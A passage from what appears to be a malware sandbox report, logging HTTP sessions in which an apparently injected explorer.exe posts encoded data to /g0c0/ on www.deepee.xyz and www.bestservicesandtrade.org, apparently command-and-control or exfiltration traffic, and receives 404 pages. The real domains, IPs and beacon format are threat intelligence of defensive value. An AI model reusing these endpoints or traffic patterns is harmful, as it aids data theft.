6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.6	49738	162.0.236.127	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:20:53.845599890 CET	1040	OUT	POST /g0c0/ HTTP/1.1 Host: www.deepee.xyz Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.deepee.xyz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.deepee.xyz/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 78 4c 61 53 6c 4f 35 31 4c 63 45 76 46 32 45 61 7e 34 68 52 39 35 46 65 62 57 4f 6b 44 47 44 58 4a 73 6b 72 55 41 70 4e 6e 31 76 4e 4c 45 5a 43 43 44 43 34 63 56 6e 48 4f 46 6a 6b 71 48 53 62 6a 57 4c 58 28 77 63 57 63 59 45 6a 28 66 6c 65 66 61 6f 62 63 73 73 55 49 76 50 57 63 67 70 47 46 33 74 33 4c 6f 6a 5f 34 74 6b 55 4e 6a 79 76 70 6c 69 35 38 7a 51 70 52 4b 46 70 36 6a 34 50 61 43 38 43 78 47 53 46 44 77 54 77 28 44 61 73 33 78 4d 42 65 39 32 6c 69 50 43 77 47 75 62 56 46 61 56 34 72 67 57 5f 59 7a 53 4f 6b 63 4f 34 70 58 4a 72 28 4a 55 2e 00 00 00 00 00 00 00 00 Data Ascii: J1ZahCdL=xLaSlO51LcEvF2Ea~4hR95FebWOkDGDXJskrUApNn1vNLEZCCDC4cVnHOFjkqHSbjWLX(wcWcYEj(flefaobcssUIvPWcgpGF3t3Loj_4tkUNjyvpli58zQpRKFp6j4PaC8CxGSFDwTw(Das3xMBe92liPCwGubVFaV4rgW_YzSOkcO4pXJr(JU.
Mar 2, 2023 17:20:54.133668900 CET	1041	IN	HTTP/1.1 404 Not Found Date: Thu, 02 Mar 2023 16:20:53 GMT Server: Apache Content-Length: 514 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.6	49740	162.0.236.127	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:20:56.545073986 CET	1050	OUT	POST /g0c0/ HTTP/1.1 Host: www.deepee.xyz Connection: close Content-Length: 1458 Cache-Control: no-cache Origin: http://www.deepee.xyz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.deepee.xyz/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 78 4c 61 53 6c 4f 35 31 4c 63 45 76 45 53 34 61 38 66 4e 52 74 70 46 64 51 32 4f 6b 57 57 43 65 4a 73 6f 72 55 42 74 64 6e 44 33 4e 49 56 4a 43 43 6c 32 34 61 56 6e 48 49 46 6a 67 33 58 53 4e 6a 53 69 6d 28 78 73 67 63 65 6b 6a 74 73 64 65 55 34 51 45 57 38 73 57 66 5f 50 52 63 67 6f 53 46 7a 42 4a 4c 6f 6e 42 34 74 73 55 4e 56 75 76 68 31 69 34 67 6a 51 70 52 4b 46 66 36 6a 34 76 61 43 31 52 78 48 4b 56 44 46 66 77 34 69 57 73 31 54 6b 43 63 39 32 68 35 50 44 76 46 72 72 52 4f 4d 49 68 6d 54 58 51 5a 6e 57 6b 7e 66 37 4d 78 53 42 44 6f 39 36 64 6e 79 67 4d 70 41 41 56 51 30 56 53 51 59 48 74 33 71 54 49 41 4d 41 7a 4f 65 72 42 78 36 5a 4b 34 63 46 31 4d 62 48 73 76 34 61 61 6a 61 30 32 69 63 4f 4d 59 6c 45 54 28 51 6e 54 35 44 71 58 36 4d 79 68 48 70 4b 30 6b 5f 55 58 50 62 6c 39 37 55 46 6a 7a 34 38 6b 4d 57 47 4f 55 64 36 77 6e 77 51 74 78 49 59 5f 64 61 32 54 33 69 79 67 75 4c 67 53 71 5a 6f 47 47 37 77 72 6d 4c 52 44 58 63 56 47 63 45 33 5f 62 4d 42 4d 63 58 30 4e 55 32 6c 50 6e 6b 41 6f 50 41 28 4b 30 53 45 62 6b 37 75 57 6d 6a 58 76 5a 6a 39 77 56 65 36 47 4a 6e 30 36 59 70 4f 51 41 48 72 33 57 53 44 50 36 78 5a 70 6e 77 4a 42 50 66 67 4f 43 68 76 39 7a 7a 65 63 62 43 39 78 74 57 77 57 47 36 4d 54 78 50 46 49 76 5a 30 39 63 44 4c 6b 48 58 6c 41 79 4d 6d 44 41 34 6b 52 75 6b 57 61 77 51 70 6a 4f 65 7a 65 5a 53 67 6e 64 64 43 51 48 32 71 70 4e 71 6d 30 5a 46 76 6b 64 30 32 6d 6d 57 55 61 6b 66 56 38 59 62 7a 44 41 33 74 78 74 2d 4c 4e 45 42 38 71 68 6b 44 45 30 61 48 4a 4f 42 7e 34 48 56 48 64 70 48 66 6c 69 72 66 38 4c 72 55 69 6d 6c 77 78 7e 48 63 75 6c 6f 35 66 33 58 30 30 46 2d 41 6f 66 79 44 73 53 56 51 4b 44 5a 6b 73 31 4a 35 65 35 63 41 65 55 78 50 6c 53 39 52 52 33 35 77 77 30 42 42 4e 71 4c 35 73 49 69 41 48 50 66 57 66 4b 6e 74 55 39 4b 72 64 68 78 55 47 4a 4c 78 57 4c 6b 71 34 57 38 52 39 37 79 6f 59 4f 32 30 55 33 39 77 43 47 59 47 6a 55 34 49 67 38 5a 79 46 36 4f 5a 61 31 58 37 4d 6b 54 47 5a 78 70 4e 33 7e 4e 30 47 53 33 6e 43 28 39 4f 62 68 57 51 79 5a 72 7e 70 30 33 31 50 69 76 28 66 4f 55 49 79 37 46 66 47 7a 41 63 50 50 5f 70 52 31 75 62 55 57 4c 72 5a 6f 56 46 50 30 76 56 6b 4c 48 4a 4b 31 74 70 6c 33 32 6f 58 30 61 6c 6e 36 4c 67 6d 77 78 62 38 76 48 70 2d 5a 2d 5a 41 70 37 66 4d 54 6c 65 59 58 57 69 73 54 4b 4c 5a 62 4b 38 54 76 49 48 55 4d 67 38 75 52 35 54 6b 6c 4b 71 4c 6c 38 71 68 7a 76 28 7a 5a 47 76 6a 50 76 45 54 69 55 64 55 49 33 70 68 52 35 47 5f 57 79 38 6f 78 4f 33 67 6d 74 6f 5a 76 36 75 37 51 56 62 32 46 55 67 4e 58 4a 4f 54 6e 34 77 61 37 5f 49 6b 6f 54 49 73 4e 33 28 43 7e 66 66 66 47 57 62 54 59 6c 52 6a 78 62 62 50 72 7a 4f 62 57 4d 4e 4f 37 6e 34 2d 34 5a 4a 73 64 53 51 7a 6b 78 47 51 42 45 49 48 45 31 55 66 63 49 45 2d 77 6c 28 39 4e 65 66 43 43 5a 56 36 4c 35 50 44 75 44 50 74 4e 79 58 4e 42 62 48 44 54 5f 30 31 48 54 32 35 7e 76 31 74 72 57 4e 77 6c 48 7a 68 56 4c 37 54 73 30 49 32 77 54 42 71 52 75 30 76 6e 30 57 65 70 66 6f 47 43 39 43 68 71 65 4f 64 46 6a 50 35 33 65 54 44 47 6b 6c 72 34 59 72 48 61 63 76 49 33 44 52 76 6b 65 43 5a 44 6e 76 55 61 67 55 44 48 61 4e 57 4b 64 7e 35 77 57 28 75 4a 66 38 49 53 6f 6b 4f 42 30 72 4a 33 31 61 65 38 72 77 6a 38 55 38 4a 6c 62 63 33 75 33 4e 52 32 52 4b 70 6e 75 6a 34 54 33 50 36 67 55 50 52 43 6c 75 65 38 33 77 32 66 64 64 53 77 79 4e 4a 58 36 66 79 5a 57 4f 71 68 53 7a 72 69 30 63 51 4d 4a 38 46 42 70 34 71 77 30 78 75 33 71 56 55 39 76 69 52 4c 32 4e 62 45 77 79 4b 4b 57 63 30 56 6e 6a 46 79 6c 69 69 75 78 77 47 57 78 68 66 59 74 72 47 78 63 69 42 28 69 63 30 59 48 62 49 51 51 44 79 56 33 37 5a 47 46 6c 59 4c 76 4f 57 6f 5a 4e 44 62 77 62 32 64 66 4c 51 79 4a 54 4b 33 37 6d 5a 53 79 72 66 59 58 31 77 46 72 44 4f 64 37 4b 41 6c 5f 59 67 37 4d 6c 54 35 74 6f 44 34 48 4f 48 51 4a 67 6a 46 73 63 56 4d 37 4c 77 6f 4f 57 68 43 41 48 72 79 59 45 61 69 73 49 32 43 50 30 59 6a 42 72 34 53 73 51 6b 44 38 7a 53 6b 5f 51 72 4e 67 44 6f 34 38 67 5f 55 45 4c 49 6d 43 7a 52 48 63 45 52 7e 68 61 55 48 5f 70 4c 72 58 52 68 4e 42 68 76 36 57 7a 4a 76 33 78 41 62 67 6c 79 63 64 31 55 59 62 42 30 47 55 70 52 31 68 Data Ascii: J1ZahCdL=xLaSlO51LcEvES4a8fNRtpFdQ2OkWWCeJsorUBtdnD3NIVJCCl24aVnHIFjg3XSNjSim(xsgcekjtsdeU4QEW8sWf_PRcgoSFzBJLonB4tsUNVuvh1i4gjQpRKFf6j4vaC1RxHKVDFfw4iWs1TkCc92h5PDvFrrROMIhmTXQZnWk~f7MxSBDo96dnygMpAAVQ0VSQYHt3qTIAMAzOerBx6ZK4cF1MbHsv4aaja02icOMYlET(QnT5DqX6MyhHpK0k_UXPbl97UFjz48kMWGOUd6wnwQtxIY_da2T3iyguLgSqZoGG7wrmLRDXcVGcE3_bMBMcX0NU2lPnkAoPA(K0SEbk7uWmjXvZj9wVe6GJn06YpOQAHr3WSDP6xZpnwJBPfgOChv9zzecbC9xtWwWG6MTxPFIvZ09cDLkHXlAyMmDA4kRukWawQpjOezeZSgnddCQH2qpNqm0ZFvkd02mmWUakfV8YbzDA3txt-LNEB8qhkDE0aHJOB~4HVHdpHflirf8LrUimlwx~Hculo5f3X00F-AofyDsSVQKDZks1J5e5cAeUxPlS9RR35ww0BBNqL5sIiAHPfWfKntU9KrdhxUGJLxWLkq4W8R97yoYO20U39wCGYGjU4Ig8ZyF6OZa1X7MkTGZxpN3~N0GS3nC(9ObhWQyZr~p031Piv(fOUIy7FfGzAcPP_pR1ubUWLrZoVFP0vVkLHJK1tpl32oX0aln6Lgmwxb8vHp-Z-ZAp7fMTleYXWisTKLZbK8TvIHUMg8uR5TklKqLl8qhzv(zZGvjPvETiUdUI3phR5G_Wy8oxO3gmtoZv6u7QVb2FUgNXJOTn4wa7_IkoTIsN3(C~fffGWbTYlRjxbbPrzObWMNO7n4-4ZJsdSQzkxGQBEIHE1UfcIE-wl(9NefCCZV6L5PDuDPtNyXNBbHDT_01HT25~v1trWNwlHzhVL7Ts0I2wTBqRu0vn0WepfoGC9ChqeOdFjP53eTDGklr4YrHacvI3DRvkeCZDnvUagUDHaNWKd~5wW(uJf8ISokOB0rJ31ae8rwj8U8Jlbc3u3NR2RKpnuj4T3P6gUPRClue83w2fddSwyNJX6fyZWOqhSzri0cQMJ8FBp4qw0xu3qVU9viRL2NbEwyKKWc0VnjFyliiuxwGWxhfYtrGxciB(ic0YHbIQQDyV37ZGFlYLvOWoZNDbwb2dfLQyJTK37mZSyrfYX1wFrDOd7KAl_Yg7MlT5toD4HOHQJgjFscVM7LwoOWhCAHryYEaisI2CP0YjBr4SsQkD8zSk_QrNgDo48g_UELImCzRHcER~haUH_pLrXRhNBhv6WzJv3xAbglycd1UYbB0GUpR1haNBpZN7U(QqHQpUOa1pc5cCtlsjnufcPaS99PCILRWe6(5YQKJcuMDbAUnF8BlRe8dr9JysyzBDCPc3q3fLV(5sxXoMrA.
Mar 2, 2023 17:20:56.848773003 CET	1051	IN	HTTP/1.1 404 Not Found Date: Thu, 02 Mar 2023 16:20:56 GMT Server: Apache Content-Length: 514 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.6	49741	162.0.236.127	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:20:59.247154951 CET	1051	OUT	GET /g0c0/?J1ZahCdL=8Jyym6YpCYcRPCA/1odg0ZVgTkbvAinOe9o7VzVA3jLVPgNwCUCgU3fRCFjwhyyCtxnZmCY1Y9AJ7NYgKKttQoxHX67xeHFuAGt1Gr3SwKhB&uEk=kKVhb1ODb HTTP/1.1 Host: www.deepee.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 2, 2023 17:20:59.527371883 CET	1052	IN	HTTP/1.1 404 Not Found Date: Thu, 02 Mar 2023 16:20:59 GMT Server: Apache Content-Length: 514 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.6	49742	208.109.43.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:21:04.846663952 CET	1053	OUT	POST /g0c0/ HTTP/1.1 Host: www.bestservicesandtrade.org Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.bestservicesandtrade.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.bestservicesandtrade.org/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 66 75 5a 61 62 37 46 32 70 32 44 5a 67 71 68 46 4a 4e 6c 76 56 36 70 75 74 6b 6f 2d 76 65 74 48 64 4f 52 50 35 58 63 45 33 65 4b 41 4e 52 72 6f 53 4d 35 65 75 45 56 32 53 68 50 41 7e 57 6c 55 75 39 42 6f 28 48 59 4f 64 48 61 64 7a 68 54 73 42 32 6c 6a 34 33 45 33 58 76 44 6d 6f 75 30 4a 76 4d 48 46 72 77 58 6b 35 4d 36 42 5a 7a 6b 79 47 71 53 4a 58 79 56 6d 73 4e 4a 77 70 6c 54 47 53 4a 49 2d 28 46 6f 67 67 64 30 4e 67 68 4b 4a 6d 75 43 45 61 56 62 6a 43 62 52 62 37 54 55 42 6c 4a 68 4d 76 58 4f 46 70 72 71 68 7e 44 64 4e 59 67 7e 62 78 6e 67 2e 00 00 00 00 00 00 00 00 Data Ascii: J1ZahCdL=fuZab7F2p2DZgqhFJNlvV6putko-vetHdORP5XcE3eKANRroSM5euEV2ShPA~WlUu9Bo(HYOdHadzhTsB2lj43E3XvDmou0JvMHFrwXk5M6BZzkyGqSJXyVmsNJwplTGSJI-(Foggd0NghKJmuCEaVbjCbRb7TUBlJhMvXOFprqh~DdNYg~bxng.
Mar 2, 2023 17:21:05.945653915 CET	1055	IN	HTTP/1.1 404 Not Found Date: Thu, 02 Mar 2023 16:21:04 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://bestservicesandtrade.org/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 32 36 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 79 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 62 65 73 74 73 65 72 76 69 63 65 73 61 6e 64 74 72 61 64 65 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 73 65 72 76 69 63 65 73 61 6e 64 74 72 61 64 65 2e 6f 72 67 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 79 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 73 65 72 76 69 63 65 73 61 6e 64 74 72 61 64 65 2e 6f 72 67 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 